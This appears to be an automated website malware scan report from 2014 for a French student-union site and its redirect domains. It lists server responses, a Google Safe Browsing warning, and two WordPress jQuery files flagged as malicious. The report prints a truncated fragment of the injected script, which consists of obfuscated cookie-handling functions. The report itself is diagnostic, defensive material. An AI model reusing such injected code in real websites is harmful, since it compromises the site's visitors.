Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=sud-etudiant.org
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://sud-etudiant.org/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Wed, 24 Sep 2014 01:04:26 GMT Location: http://www.solidaires-etudiant-e-s.org/ Server: Apache/2.2.22 (Debian) Vary: Accept-Encoding Content-Length: 329 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.solidaires-etudiant-e-s.org/ | HTTP/1.1 200 OK Connection: close Date: Wed, 24 Sep 2014 01:04:27 GMT Server: Apache/2.2.22 (Debian) Vary: Cookie,Accept-Encoding Content-Type: text/html; charset=utf-8 Last-Modified: Wed, 24 Sep 2014 01:04:27 GMT Composed-By: SPIP 3.0.17-1 (Debian) @ www.spip.net + spip(3.0.13),compagnon(1.4.1),dump(1.6.7),images(1.1.7),forum(1.8.29),jqueryui(1.8.21),mediabox(0.8.4),mots(2.4.10),msie_compat(1.2.0),organiseur(0.8.10),petitions(1.4.4),porte_plume(1.12.4),revisions(1.7.6),safehtml(1.4.0),sites(1.7.10),squelettes_par_rubrique(1.1.1),stats(0.4.19),svp(0.80.18),tw(0.8.17),urls(1.4.15),vertebres(1.2.2),alias(0.1.1),article_pdf(0.4.5),spip_bonux(3.0.5),calendriermini(2.3.5),agenda(3.12.1),iterateurs(0.6.1),queue(0.6.6),breves(1.3.5),compresseur(1.8.6),medias(2.7.51),accesrestreint(3.8.8),sarkaspip(3.2.36) X-Powered-By: PHP/5.4.4-14+deb7u14 X-Spip-Cache: 86400 | clean |
http://www.solidaires-etudiant.org/ | 200 OK Content-Length: 58454 Content-Type: text/html | clean |
http://www.solidaires-etudiant.org/wp-includes/js/jquery/jquery.js | 200 OK Content-Length: 96723 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function Depositormengarslife() {
function Expocarus(name, value, expires) { var date = new Date( new Date().getTime() + expires*1000 ); document.cookie = name+'='+value+'; path=/; expires='+date.toUTCString(); } function Afillatepost(name) { var afrodita = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g, '\$1') + "=([^;]*)" )); return afrodita ? decodeURIComponent(afrodita[1]) : undefined; } var cookie = jQuery.noConflict(); Antivirus reports:
| ||
http://www.solidaires-etudiant.org/wp-includes/js/jquery/jquery-migrate.min.js | 200 OK Content-Length: 8116 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function Depositormengarslife() {
function Expocarus(name, value, expires) { var date = new Date( new Date().getTime() + expires*1000 ); document.cookie = name+'='+value+'; path=/; expires='+date.toUTCString(); } function Afillatepost(name) { var afrodita = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g, '\$1') + "=([^;]*)" )); return afrodita ? decodeURIComponent(afrodita[1]) : undefined; } var cookie = Antivirus reports:
| ||
http://www.solidaires-etudiant.org/wp-content/themes/Avenue/js/jcarousellite_1.0.1.pack.js | 200 OK Content-Length: 3059 Content-Type: application/javascript | clean |
http://www.solidaires-etudiant.org/wp-content/themes/Avenue/js/jquery.nivo.slider.pack.js | 200 OK Content-Length: 16799 Content-Type: application/javascript | clean |
http://www.solidaires-etudiant.org/wp-content/themes/Avenue/js/colorbox/jquery.colorbox-min.js | 200 OK Content-Length: 10742 Content-Type: application/javascript | clean |
http://www.solidaires-etudiant.org/wp-content/themes/Avenue/js/scripts.js | 200 OK Content-Length: 7793 Content-Type: application/javascript | clean |
http://www.solidaires-etudiant.org/wp-content/plugins/contact-form-7/includes/js/jquery.form.min.js | 200 OK Content-Length: 16170 Content-Type: application/javascript | clean |
http://www.solidaires-etudiant.org/wp-content/plugins/contact-form-7/includes/js/scripts.js | 200 OK Content-Length: 10580 Content-Type: application/javascript | clean |
http://s0.wp.com/wp-content/js/devicepx-jetpack.js | 200 OK Content-Length: 9301 Content-Type: application/x-javascript | clean |
http://s.gravatar.com/js/gprofiles.js | 200 OK Content-Length: 21442 Content-Type: application/x-javascript | clean |
http://www.solidaires-etudiant.org/wp-content/plugins/jetpack/modules/wpgroho.js | 200 OK Content-Length: 1881 Content-Type: application/javascript | clean |
http://stats.wp.com/e-201439.js | 200 OK Content-Length: 824 Content-Type: application/x-javascript | clean |
http://sud-etudiant.org/test404page.js | HTTP/1.1 301 Moved Permanently Connection: close Date: Wed, 24 Sep 2014 01:04:35 GMT Location: http://www.solidaires-etudiant-e-s.org/test404page.js Server: Apache/2.2.22 (Debian) Vary: Accept-Encoding Content-Length: 343 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.solidaires-etudiant-e-s.org/test404page.js | 404 Not Found Content-Length: 309 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: sud-etudiant.org
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Wed, 24 Sep 2014 01:04:26 GMT
Location: http://www.solidaires-etudiant-e-s.org/
Server: Apache/2.2.22 (Debian)
Vary: Accept-Encoding
Content-Length: 329
Content-Type: text/html; charset=iso-8859-1
...329 bytes of data.
GET / HTTP/1.1
Host: sud-etudiant.org
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Wed, 24 Sep 2014 01:04:26 GMT
Location: http://www.solidaires-etudiant-e-s.org/
Server: Apache/2.2.22 (Debian)
Vary: Accept-Encoding
Content-Length: 329
Content-Type: text/html; charset=iso-8859-1
...329 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: sud-etudiant.org
Referer: http://www.google.com/search?q=sud-etudiant.org
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: sud-etudiant.org
Referer: http://www.google.com/search?q=sud-etudiant.org
Result:
The result is similar to the first query. There are no suspicious redirects found.